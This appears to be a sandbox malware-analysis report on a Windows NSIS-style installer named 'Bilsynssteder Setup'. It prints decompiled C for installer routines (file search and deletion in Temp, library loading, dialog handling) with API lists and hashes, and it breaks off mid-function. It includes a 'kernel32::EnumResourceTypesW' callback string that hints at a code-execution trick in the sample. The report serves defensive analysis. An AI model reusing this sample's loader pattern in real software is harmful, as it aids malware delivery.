                                  				signed int _v16;
                                  				signed char _v20;
                                  				signed int _v24;
                                  				signed char _v28;
                                  				signed int _t37;
                                  				CHAR* _t38;
                                  				signed int _t40;
                                  				int _t41;
                                  				char _t51;
                                  				char _t52;
                                  				char _t54;
                                  				char _t56;
                                  				void* _t64;
                                  				signed int _t70;
                                  				intOrPtr _t74;
                                  				signed int _t75;
                                  				signed int _t76;
                                  				intOrPtr _t80;
                                  				char _t82;
                                  				void* _t86;
                                  				CHAR* _t87;
                                  				void* _t89;
                                  				signed int _t96;
                                  				signed int _t98;
                                  				void* _t99;
                                  
                                  				_t89 = __esi;
                                  				_t86 = __edi;
                                  				_t64 = __ebx;
                                  				_t37 = _a8;
                                  				if(_t37 < 0) {
                                  					_t80 =  *0x42e37c; // 0x5ac8c7
                                  					_t37 =  *(_t80 - 4 + _t37 * 4);
                                  				}
                                  				_t74 =  *0x42ebd8; // 0x5aba28
                                  				_push(_t64);
                                  				_t75 = _t74 + _t37;
                                  				_t38 = 0x42db40;
                                  				_push(_t89);
                                  				_push(_t86);
                                  				_t87 = 0x42db40;
                                  				if(_a4 >= 0x42db40 && _a4 - 0x42db40 < 0x800) {
                                  					_t87 = _a4;
                                  					_a4 = _a4 & 0x00000000;
                                  				}
                                  				while(1) {
                                  					_t82 =  *_t75;
                                  					if(_t82 == 0) {
                                  						break;
                                  					}
                                  					__eflags = _t87 - _t38 - 0x400;
                                  					if(_t87 - _t38 >= 0x400) {
                                  						break;
                                  					}
                                  					_t75 = _t75 + 1;
                                  					__eflags = _t82 - 4;
                                  					_a8 = _t75;
                                  					if(__eflags >= 0) {
                                  						if(__eflags != 0) {
                                  							 *_t87 = _t82;
                                  							_t87 =  &(_t87[1]);
                                  							__eflags = _t87;
                                  						} else {
                                  							 *_t87 =  *_t75;
                                  							_t87 =  &(_t87[1]);
                                  							_t75 = _t75 + 1;
                                  						}
                                  						continue;
                                  					}
                                  					_t40 =  *(_t75 + 1);
                                  					_t76 =  *_t75;
                                  					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
                                  					_a8 = _a8 + 2;
                                  					_v28 = _t76 | 0x00000080;
                                  					_t70 = _t76;
                                  					_v24 = _t70;
                                  					__eflags = _t82 - 2;
                                  					_v20 = _t40 | 0x00000080;
                                  					_v16 = _t40;
                                  					if(_t82 != 2) {
                                  						__eflags = _t82 - 3;
                                  						if(_t82 != 3) {
                                  							__eflags = _t82 - 1;
                                  							if(_t82 == 1) {
                                  								__eflags = (_t40 | 0xffffffff) - _t96;
                                  								E00405BBA(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
                                  							}
                                  							L42:
                                  							_t41 = lstrlenA(_t87);
                                  							_t75 = _a8;
                                  							_t87 =  &(_t87[_t41]);
                                  							_t38 = 0x42db40;
                                  							continue;
                                  						}
                                  						__eflags = _t96 - 0x1d;
                                  						if(_t96 != 0x1d) {
                                  							__eflags = "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t96 << 0xa);
                                  							E00405B98(_t87, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t96 << 0xa));
                                  						} else {
                                  							E00405AF6(_t87,  *0x42eba8);
                                  						}
                                  						__eflags = _t96 + 0xffffffeb - 7;
                                  						if(_t96 + 0xffffffeb < 7) {
                                  							L33:
                                  							E00405E03(_t87);
                                  						}
                                  						goto L42;
                                  					}
                                  					_t98 = 2;
                                  					_t51 = GetVersion();
                                  					__eflags = _t51;
                                  					if(_t51 >= 0) {
                                  						L13:
                                  						_v8 = 1;
                                  						L14:
                                  						__eflags =  *0x42ec24;
                                  						if( *0x42ec24 != 0) {
                                  							_t98 = 4;
                                  						}
                                  						__eflags = _t70;
                                  						if(_t70 >= 0) {
                                  							__eflags = _t70 - 0x25;
                                  							if(_t70 != 0x25) {
                                  								__eflags = _t70 - 0x24;
                                  								if(_t70 == 0x24) {
                                  									GetWindowsDirectoryA(_t87, 0x400);
                                  									_t98 = 0;
                                  								}
                                  								while(1) {
                                  									__eflags = _t98;
                                  									if(_t98 == 0) {
                                  										goto L30;
                                  									}
                                  									_t52 =  *0x42eba4; // 0x73521340
                                  									_t98 = _t98 - 1;
                                  									__eflags = _t52;
                                  									if(_t52 == 0) {
                                  										L26:
                                  										_t54 = SHGetSpecialFolderLocation( *0x42eba8,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
                                  										__eflags = _t54;
                                  										if(_t54 != 0) {
                                  											L28:
                                  											 *_t87 =  *_t87 & 0x00000000;
                                  											__eflags =  *_t87;
                                  											continue;
                                  										}
                                  										__imp__SHGetPathFromIDListA(_v12, _t87);
                                  										__imp__CoTaskMemFree(_v12);
                                  										__eflags = _t54;
                                  										if(_t54 != 0) {
                                  											goto L30;
                                  										}
                                  										goto L28;
                                  									}
                                  									__eflags = _v8;
                                  									if(_v8 == 0) {
                                  										goto L26;
                                  									}
                                  									_t56 =  *_t52( *0x42eba8,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87); // executed
                                  									__eflags = _t56;
                                  									if(_t56 == 0) {
                                  										goto L30;
                                  									}
                                  									goto L26;
                                  								}
                                  								goto L30;
                                  							}
                                  							GetSystemDirectoryA(_t87, 0x400);
                                  							goto L30;
                                  						} else {
                                  							_t73 = (_t70 & 0x0000003f) +  *0x42ebd8;
                                  							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x42ebd8, _t87, _t70 & 0x00000040); // executed
                                  							__eflags =  *_t87;
                                  							if( *_t87 != 0) {
                                  								L31:
                                  								__eflags = _v16 - 0x1a;
                                  								if(_v16 == 0x1a) {
                                  									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                  								}
                                  								goto L33;
                                  							}
                                  							E00405BBA(_t73, _t87, _t98, _t87, _v16);
                                  							L30:
                                  							__eflags =  *_t87;
                                  							if( *_t87 == 0) {
                                  								goto L33;
                                  							}
                                  							goto L31;
                                  						}
                                  					}
                                  					__eflags = _t51 - 0x5a04;
                                  					if(_t51 == 0x5a04) {
                                  						goto L13;
                                  					}
                                  					__eflags = _v16 - 0x23;
                                  					if(_v16 == 0x23) {
                                  						goto L13;
                                  					}
                                  					__eflags = _v16 - 0x2e;
                                  					if(_v16 == 0x2e) {
                                  						goto L13;
                                  					} else {
                                  						_v8 = _v8 & 0x00000000;
                                  						goto L14;
                                  					}
                                  				}
                                  				 *_t87 =  *_t87 & 0x00000000;
                                  				if(_a4 == 0) {
                                  					return _t38;
                                  				}
                                  				return E00405B98(_a4, _t38);
                                  			}

                                  APIs
                                  • GetVersion.KERNEL32(00000000,00429800,00000000,00404EDD,00429800,00000000), ref: 00405C6B
                                  • GetSystemDirectoryA.KERNEL32 ref: 00405CE6
                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CF9
                                  • SHGetSpecialFolderLocation.SHELL32(?,0041B7D0), ref: 00405D35
                                  • SHGetPathFromIDListA.SHELL32(0041B7D0,Call), ref: 00405D43
                                  • CoTaskMemFree.OLE32(0041B7D0), ref: 00405D4E
                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D70
                                  • lstrlenA.KERNEL32(Call,00000000,00429800,00000000,00404EDD,00429800,00000000), ref: 00405DC2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                  • API String ID: 900638850-3610614223
                                  • Opcode ID: 7ac0715764b03952955c741026f92e0c7695d25b47a09633014e38aa7c8f6962
                                  • Instruction ID: e530b436d7c2447f25c0a1e821fc153bec7607d44657ce307fe97dbee56ab49a
                                  • Opcode Fuzzy Hash: 7ac0715764b03952955c741026f92e0c7695d25b47a09633014e38aa7c8f6962
                                  • Instruction Fuzzy Hash: 9261E170A04A05ABEF205F658C88BBB7BA4EF15714F50813BE902BA2D1D27C5942DF4E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 537 405475-40549b call 405733 540 4054b4-4054bb 537->540 541 40549d-4054af DeleteFileA 537->541 543 4054bd-4054bf 540->543 544 4054ce-4054de call 405b98 540->544 542 40563e-405642 541->542 545 4054c5-4054c8 543->545 546 4055ec-4055f1 543->546 552 4054e0-4054eb lstrcatA 544->552 553 4054ed-4054ee call 40568c 544->553 545->544 545->546 546->542 548 4055f3-4055f6 546->548 550 405600-405608 call 405e9c 548->550 551 4055f8-4055fe 548->551 550->542 561 40560a-40561e call 405645 call 40542d 550->561 551->542 555 4054f3-4054f6 552->555 553->555 558 405501-405507 lstrcatA 555->558 559 4054f8-4054ff 555->559 560 40550c-40552a lstrlenA FindFirstFileA 558->560 559->558 559->560 562 405530-405547 call 405670 560->562 563 4055e2-4055e6 560->563 576 405620-405623 561->576 577 405636-405639 call 404ea5 561->577 570 405552-405555 562->570 571 405549-40554d 562->571 563->546 565 4055e8 563->565 565->546 574 405557-40555c 570->574 575 405568-405576 call 405b98 570->575 571->570 573 40554f 571->573 573->570 579 4055c1-4055d3 FindNextFileA 574->579 580 40555e-405560 574->580 588 405578-405580 575->588 589 40558d-405598 call 40542d 575->589 576->551 582 405625-405634 call 404ea5 call 405a4c 576->582 577->542 579->562 585 4055d9-4055dc FindClose 579->585 580->575 583 405562-405566 580->583 582->542 583->575 583->579 585->563 588->579 592 405582-40558b call 405475 588->592 597 4055b9-4055bc call 404ea5 589->597 598 40559a-40559d 589->598 592->579 597->579 599 4055b1-4055b7 598->599 600 40559f-4055af call 404ea5 call 405a4c 598->600 599->579 600->579
                                  C-Code - Quality: 98%
                                  			E00405475(void* __eflags, signed int _a4, signed int _a8) {
                                  				signed int _v8;
                                  				void* _v12;
                                  				signed int _v16;
                                  				struct _WIN32_FIND_DATAA _v336;
                                  				signed int _t40;
                                  				char* _t53;
                                  				signed int _t55;
                                  				signed int _t58;
                                  				signed int _t64;
                                  				signed int _t66;
                                  				void* _t68;
                                  				signed char _t69;
                                  				CHAR* _t71;
                                  				CHAR* _t72;
                                  				char* _t75;
                                  
                                  				_t69 = _a8;
                                  				_t72 = _a4;
                                  				_v8 = _t69 & 0x00000004;
                                  				_t40 = E00405733(__eflags, _t72);
                                  				_v16 = _t40;
                                  				if((_t69 & 0x00000008) != 0) {
                                  					_t66 = DeleteFileA(_t72); // executed
                                  					asm("sbb eax, eax");
                                  					_t68 =  ~_t66 + 1;
                                  					 *0x42ec28 =  *0x42ec28 + _t68;
                                  					return _t68;
                                  				}
                                  				_a4 = _t69;
                                  				_t8 =  &_a4;
                                  				 *_t8 = _a4 & 0x00000001;
                                  				__eflags =  *_t8;
                                  				if( *_t8 == 0) {
                                  					L5:
                                  					E00405B98(0x42b028, _t72);
                                  					__eflags = _a4;
                                  					if(_a4 == 0) {
                                  						E0040568C(_t72);
                                  					} else {
                                  						lstrcatA(0x42b028, "\\*.*");
                                  					}
                                  					__eflags =  *_t72;
                                  					if( *_t72 != 0) {
                                  						L10:
                                  						lstrcatA(_t72, 0x409014);
                                  						L11:
                                  						_t71 =  &(_t72[lstrlenA(_t72)]); // executed
                                  						_t40 = FindFirstFileA(0x42b028,  &_v336); // executed
                                  						__eflags = _t40 - 0xffffffff;
                                  						_v12 = _t40;
                                  						if(_t40 == 0xffffffff) {
                                  							L29:
                                  							__eflags = _a4;
                                  							if(_a4 != 0) {
                                  								_t32 = _t71 - 1;
                                  								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                  								__eflags =  *_t32;
                                  							}
                                  							goto L31;
                                  						} else {
                                  							goto L12;
                                  						}
                                  						do {
                                  							L12:
                                  							_t75 =  &(_v336.cFileName);
                                  							_t53 = E00405670( &(_v336.cFileName), 0x3f);
                                  							__eflags =  *_t53;
                                  							if( *_t53 != 0) {
                                  								__eflags = _v336.cAlternateFileName;
                                  								if(_v336.cAlternateFileName != 0) {
                                  									_t75 =  &(_v336.cAlternateFileName);
                                  								}
                                  							}
                                  							__eflags =  *_t75 - 0x2e;
                                  							if( *_t75 != 0x2e) {
                                  								L19:
                                  								E00405B98(_t71, _t75);
                                  								__eflags = _v336.dwFileAttributes & 0x00000010;
                                  								if(__eflags == 0) {
                                  									_t55 = E0040542D(__eflags, _t72, _v8);
                                  									__eflags = _t55;
                                  									if(_t55 != 0) {
                                  										E00404EA5(0xfffffff2, _t72);
                                  									} else {
                                  										__eflags = _v8 - _t55;
                                  										if(_v8 == _t55) {
                                  											 *0x42ec28 =  *0x42ec28 + 1;
                                  										} else {
                                  											E00404EA5(0xfffffff1, _t72);
                                  											E00405A4C(_t72, 0);
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = (_a8 & 0x00000003) - 3;
                                  									if(__eflags == 0) {
                                  										E00405475(__eflags, _t72, _a8);
                                  									}
                                  								}
                                  								goto L27;
                                  							}
                                  							_t64 =  *((intOrPtr*)(_t75 + 1));
                                  							__eflags = _t64;
                                  							if(_t64 == 0) {
                                  								goto L27;
                                  							}
                                  							__eflags = _t64 - 0x2e;
                                  							if(_t64 != 0x2e) {
                                  								goto L19;
                                  							}
                                  							__eflags =  *((char*)(_t75 + 2));
                                  							if( *((char*)(_t75 + 2)) == 0) {
                                  								goto L27;
                                  							}
                                  							goto L19;
                                  							L27:
                                  							_t58 = FindNextFileA(_v12,  &_v336);
                                  							__eflags = _t58;
                                  						} while (_t58 != 0);
                                  						_t40 = FindClose(_v12);
                                  						goto L29;
                                  					}
                                  					__eflags =  *0x42b028 - 0x5c;
                                  					if( *0x42b028 != 0x5c) {
                                  						goto L11;
                                  					}
                                  					goto L10;
                                  				} else {
                                  					__eflags = _t40;
                                  					if(_t40 == 0) {
                                  						L31:
                                  						__eflags = _a4;
                                  						if(_a4 == 0) {
                                  							L39:
                                  							return _t40;
                                  						}
                                  						__eflags = _v16;
                                  						if(_v16 != 0) {
                                  							_t40 = E00405E9C(_t72);
                                  							__eflags = _t40;
                                  							if(_t40 == 0) {
                                  								goto L39;
                                  							}
                                  							E00405645(_t72);
                                  							_t40 = E0040542D(__eflags, _t72, _v8 | 0x00000001);
                                  							__eflags = _t40;
                                  							if(_t40 != 0) {
                                  								return E00404EA5(0xffffffe5, _t72);
                                  							}
                                  							__eflags = _v8;
                                  							if(_v8 == 0) {
                                  								goto L33;
                                  							}
                                  							E00404EA5(0xfffffff1, _t72);
                                  							return E00405A4C(_t72, 0);
                                  						}
                                  						L33:
                                  						 *0x42ec28 =  *0x42ec28 + 1;
                                  						return _t40;
                                  					}
                                  					__eflags = _t69 & 0x00000002;
                                  					if((_t69 & 0x00000002) == 0) {
                                  						goto L31;
                                  					}
                                  					goto L5;
                                  				}
                                  			}

                                  APIs
                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 0040549E
                                  • lstrcatA.KERNEL32(Resolver.Sel,\*.*,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 004054E6
                                  • lstrcatA.KERNEL32(?,00409014,?,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 00405507
                                  • lstrlenA.KERNEL32(?,?,00409014,?,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 0040550D
                                  • FindFirstFileA.KERNELBASE(Resolver.Sel,?,?,?,00409014,?,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 0040551E
                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055CB
                                  • FindClose.KERNEL32(00000000), ref: 004055DC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$C:\Users\user\AppData\Local\Temp\$Resolver.Sel$\*.*
                                  • API String ID: 2035342205-2573773740
                                  • Opcode ID: 6ff50277c47477ba13b9978e87605e00e69da3f94f5fa5e74a520864d0ac4353
                                  • Instruction ID: dbbc29da06062d166e219680d33f07273b6795458a0971578ca4c48f9a6f899a
                                  • Opcode Fuzzy Hash: 6ff50277c47477ba13b9978e87605e00e69da3f94f5fa5e74a520864d0ac4353
                                  • Instruction Fuzzy Hash: C051EE30800A04BADF22AB62CC45BAF7AB9DB42314F54417BF455711D2CB3C9A82DF6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405E9C(CHAR* _a4) {
                                  				void* _t2;
                                  
                                  				_t2 = FindFirstFileA(_a4, 0x42b870); // executed
                                  				if(_t2 == 0xffffffff) {
                                  					return 0;
                                  				}
                                  				FindClose(_t2); // executed
                                  				return 0x42b870;
                                  			}





                                  APIs
                                  • FindFirstFileA.KERNELBASE(?,0042B870,Resolver.Sel,00405776,Resolver.Sel,Resolver.Sel,00000000,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90), ref: 00405EA7
                                  • FindClose.KERNELBASE(00000000), ref: 00405EB3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: Resolver.Sel
                                  • API String ID: 2295610775-3053244350
                                  • Opcode ID: 1aea5c224ac18c2ca6740f992a10f01b1202162fc1be4398f9fc9754ba096347
                                  • Instruction ID: 48e65e0373d101f51a2011d852bf3b0db847c0e77ea6d2d4d1a06a98fdfa31a0
                                  • Opcode Fuzzy Hash: 1aea5c224ac18c2ca6740f992a10f01b1202162fc1be4398f9fc9754ba096347
                                  • Instruction Fuzzy Hash: 2BD01235A0A4309BD3011738AD0C84B7A58DB053317108A33F8A9F13E0D3349D529AED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405EC3(signed int _a4) {
                                  				struct HINSTANCE__* _t5;
                                  				CHAR* _t7;
                                  				signed int _t9;
                                  
                                  				_t9 = _a4 << 3;
                                  				_t7 =  *(_t9 + 0x409238);
                                  				_t5 = GetModuleHandleA(_t7);
                                  				if(_t5 != 0) {
                                  					L2:
                                  					return GetProcAddress(_t5,  *(_t9 + 0x40923c));
                                  				}
                                  				_t5 = LoadLibraryA(_t7); // executed
                                  				if(_t5 != 0) {
                                  					goto L2;
                                  				}
                                  				return _t5;
                                  			}







                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?,00403150,00000008), ref: 00405ED5
                                  • LoadLibraryA.KERNELBASE(?,?,?,00403150,00000008), ref: 00405EE0
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405EF1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: AddressHandleLibraryLoadModuleProc
                                  • String ID:
                                  • API String ID: 310444273-0
                                  • Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                  • Instruction ID: dab59f0173490024aeed2266f34dc7cbbf7987d09f0ead05b8accc78f0831993
                                  • Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                  • Instruction Fuzzy Hash: ADE0C232A04511ABC720AB30ED0897B73ACEF88B41701497EF985F6151DB34AC11AFBB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function 004039D5; legend: Executed / Not Executed)
                                  C-Code - Quality: 84%
                                  			E004039D5(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                  				struct HWND__* _v32;
                                  				void* _v84;
                                  				void* _v88;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t35;
                                  				signed int _t37;
                                  				signed int _t39;
                                  				intOrPtr _t44;
                                  				struct HWND__* _t49;
                                  				signed int _t67;
                                  				struct HWND__* _t73;
                                  				signed int _t86;
                                  				struct HWND__* _t91;
                                  				signed int _t99;
                                  				int _t103;
                                  				signed int _t115;
                                  				signed int _t116;
                                  				int _t117;
                                  				signed int _t122;
                                  				struct HWND__* _t125;
                                  				struct HWND__* _t126;
                                  				int _t127;
                                  				long _t130;
                                  				int _t132;
                                  				int _t133;
                                  				void* _t134;
                                  				void* _t141;
                                  				void* _t142;
                                  
                                  				_t115 = _a8;
                                  				if(_t115 == 0x110 || _t115 == 0x408) {
                                  					_t35 = _a12;
                                  					_t125 = _a4;
                                  					__eflags = _t115 - 0x110;
                                  					 *0x42a008 = _t35;
                                  					if(_t115 == 0x110) {
                                  						 *0x42eba8 = _t125;
                                  						 *0x42a01c = GetDlgItem(_t125, 1);
                                  						_t91 = GetDlgItem(_t125, 2);
                                  						_push(0xffffffff);
                                  						_push(0x1c);
                                  						 *0x428fe8 = _t91;
                                  						E00403EA8(_t125);
                                  						SetClassLongA(_t125, 0xfffffff2,  *0x42e388); // executed
                                  						 *0x42e36c = E0040140B(4);
                                  						_t35 = 1;
                                  						__eflags = 1;
                                  						 *0x42a008 = 1;
                                  					}
                                  					_t122 =  *0x4091d4; // 0x0
                                  					_t133 = 0;
                                  					_t130 = (_t122 << 6) +  *0x42ebc0;
                                  					__eflags = _t122;
                                  					if(_t122 < 0) {
                                  						L34:
                                  						E00403EF4(0x40b);
                                  						while(1) {
                                  							_t37 =  *0x42a008;
                                  							 *0x4091d4 =  *0x4091d4 + _t37;
                                  							_t130 = _t130 + (_t37 << 6);
                                  							_t39 =  *0x4091d4; // 0x0
                                  							__eflags = _t39 -  *0x42ebc4; // 0x4
                                  							if(__eflags == 0) {
                                  								E0040140B(1);
                                  							}
                                  							__eflags =  *0x42e36c - _t133; // 0x0
                                  							if(__eflags != 0) {
                                  								break;
                                  							}
                                  							_t44 =  *0x42ebc4; // 0x4
                                  							__eflags =  *0x4091d4 - _t44; // 0x0
                                  							if(__eflags >= 0) {
                                  								break;
                                  							}
                                  							_t116 =  *(_t130 + 0x14);
                                  							E00405BBA(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                  							_push( *((intOrPtr*)(_t130 + 0x20)));
                                  							_push(0xfffffc19);
                                  							E00403EA8(_t125);
                                  							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                  							_push(0xfffffc1b);
                                  							E00403EA8(_t125);
                                  							_push( *((intOrPtr*)(_t130 + 0x28)));
                                  							_push(0xfffffc1a);
                                  							E00403EA8(_t125);
                                  							_t49 = GetDlgItem(_t125, 3);
                                  							__eflags =  *0x42ec2c - _t133; // 0x0
                                  							_v32 = _t49;
                                  							if(__eflags != 0) {
                                  								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                  								__eflags = _t116;
                                  							}
                                  							ShowWindow(_t49, _t116 & 0x00000008); // executed
                                  							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
                                  							E00403ECA(_t116 & 0x00000002);
                                  							_t117 = _t116 & 0x00000004;
                                  							EnableWindow( *0x428fe8, _t117);
                                  							__eflags = _t117 - _t133;
                                  							if(_t117 == _t133) {
                                  								_push(1);
                                  							} else {
                                  								_push(_t133);
                                  							}
                                  							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                  							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                  							__eflags =  *0x42ec2c - _t133; // 0x0
                                  							if(__eflags == 0) {
                                  								_push( *0x42a01c);
                                  							} else {
                                  								SendMessageA(_t125, 0x401, 2, _t133);
                                  								_push( *0x428fe8);
                                  							}
                                  							E00403EDD();
                                  							E00405B98(0x42a020, "Bilsynssteder Setup");
                                  							E00405BBA(0x42a020, _t125, _t130,  &(0x42a020[lstrlenA(0x42a020)]),  *((intOrPtr*)(_t130 + 0x18)));
                                  							SetWindowTextA(_t125, 0x42a020); // executed
                                  							_push(_t133);
                                  							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                  							__eflags = _t67;
                                  							if(_t67 != 0) {
                                  								continue;
                                  							} else {
                                  								__eflags =  *_t130 - _t133;
                                  								if( *_t130 == _t133) {
                                  									continue;
                                  								}
                                  								__eflags =  *(_t130 + 4) - 5;
                                  								if( *(_t130 + 4) != 5) {
                                  									DestroyWindow( *0x42e378); // executed
                                  									 *0x4297f8 = _t130;
                                  									__eflags =  *_t130 - _t133;
                                  									if( *_t130 <= _t133) {
                                  										goto L58;
                                  									}
                                  									_t73 = CreateDialogParamA( *0x42eba0,  *_t130 +  *0x42e380 & 0x0000ffff, _t125,  *(0x4091d8 +  *(_t130 + 4) * 4), _t130); // executed
                                  									__eflags = _t73 - _t133;
                                  									 *0x42e378 = _t73;
                                  									if(_t73 == _t133) {
                                  										goto L58;
                                  									}
                                  									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                  									_push(6);
                                  									E00403EA8(_t73);
                                  									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                  									ScreenToClient(_t125, _t134 + 0x10);
                                  									SetWindowPos( *0x42e378, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                  									_push(_t133);
                                  									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                  									__eflags =  *0x42e36c - _t133; // 0x0
                                  									if(__eflags != 0) {
                                  										goto L61;
                                  									}
                                  									ShowWindow( *0x42e378, 8);
                                  									E00403EF4(0x405);
                                  									goto L58;
                                  								}
                                  								__eflags =  *0x42ec2c - _t133; // 0x0
                                  								if(__eflags != 0) {
                                  									goto L61;
                                  								}
                                  								__eflags =  *0x42ec20 - _t133; // 0x0
                                  								if(__eflags != 0) {
                                  									continue;
                                  								}
                                  								goto L61;
                                  							}
                                  						}
                                  						DestroyWindow( *0x42e378);
                                  						 *0x42eba8 = _t133;
                                  						EndDialog(_t125,  *0x4293f0);
                                  						goto L58;
                                  					} else {
                                  						__eflags = _t35 - 1;
                                  						if(_t35 != 1) {
                                  							L33:
                                  							__eflags =  *_t130 - _t133;
